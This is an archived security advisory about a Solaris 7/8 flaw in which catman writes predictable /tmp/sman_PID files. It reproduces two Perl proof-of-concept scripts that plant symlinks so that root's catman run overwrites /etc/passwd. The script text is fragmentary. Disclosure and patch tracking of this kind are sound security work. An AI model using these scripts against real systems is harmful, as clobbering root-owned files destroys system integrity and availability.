TUCoPS :: SunOS/Solaris :: catman.htm

Solaris 7,8 symlink bug - clobber root owned files



    Solaris 7, 8


    Following  was  founnd  by  Larry  W.  Cashdollar from Vapid Labs.
    Through  the  use  of   symlinking  temporary  files  created   by
    /usr/bin/catman upon execution  by root a  local user can  clobber
    root owned files.

    The catman  command creates  preformatted versions  of the  online
    manual.  It  also creates the  windex database for  utilities like
    apropos  and  whatis.   The  problem  lies  with catman creating a
    temporary   file   in   /tmp,   the   file   has   the   form   of
    /tmp/sman_pidofcatman.  An attacker  can monitor the process  list
    for the execution of catman and  create a symlink to a root  owned
    file.  catman will upon  execution overwrite the contents of  that
    file.  This is  a new bug for  catman and is not  addressed in the
    current patch cluster for Solaris 2.7 Sparc.


    #!/usr/local/bin/perl -w
    # The problem is catman creates files in /tmp insecurly. They are based on the
    # PID of the catman process,  catman will happily clobber any files that are
    # symlinked to that file.
    # The idea of this script is to create a block of symlinks to the target file
    # with the current PID  as a starting point.  Depending on what load your
    # system has this creates 1000 files in /tmp as sman_$currentpid + 1000.
    # The drawback is you would have to know around when root would be executing
    # catman.
    # A better solution would be to monitor for the catman process and create the
    # link before catman creates the file.  I think this is a really small window
    # however. This worked on a patched Solaris 2.7 box (August 2000 patch
    # cluster)
    # SunOS rootabega 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-1
    # lwc@vapid.betteros.org   11/21/2000   Vapid Labs.
    # http://vapid.betteros.org
    $clobber = "/etc/passwd"; #file to clobber
    $Xc=$X; #Constant
    while($X < $Y) {
    print "Linking /tmp/sman_$X to $clobber :";
    # Change $clobber to what you want to clobber.
    if (symlink ($clobber, "/tmp/sman_$X")) {
	    print "Sucess\n";
 	    else { print "failed, Busy system?\n";}
    #Watch /tmp and see if catman is executed in time.
    while(1)  {
    $list = "/usr/bin/ls -l /tmp | grep sman|grep root |";
    open (list,$list) or "die cant open ls...\n";
    while(<list>) {
	    @args = split "_",$_;
	    chop ($args[1]);
        if ($args[1] >= $Xc && $args[1] <= $Y){
		    print "Looks like pid $args[1] is the winner\n cleaning....\n";
		    `/usr/bin/rm -f /tmp/sman*`;


    #!/usr/local/bin/perl -w
    # The problem is catman creates files in /tmp insecurly. They are based on the PID of the catman
    # process,  catman will happily clobber any files that are symlinked to that file.
    # The idea of this script is to watch the process list for the catman process,
    # get the pid and Create a symlink in /tmp to our file to be
    # clobbered.  This exploit depends on system speed and process load.
    # This worked on a patched Solaris 2.7 box (August 2000 patch cluster)
    # SunOS rootabega 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-1
    # lwc@vapid.betteros.org   11/21/2000   Vapid Labs.
    # http://vapid.betteros.org
    $clobber = "/etc/pass";
    while(1) {
    open ps,"ps -ef | grep -v grep |grep -v PID |";
    while(<ps>) {
    @args = split " ", $_;
    if (/catman/) {
	    print "Symlinking sman_$args[1] to  $clobber\n";


    The  vendor  is  currently  working  on  releasing  a  patch.  See
    references section  for Vendor  contact information.   Sun  BugID:

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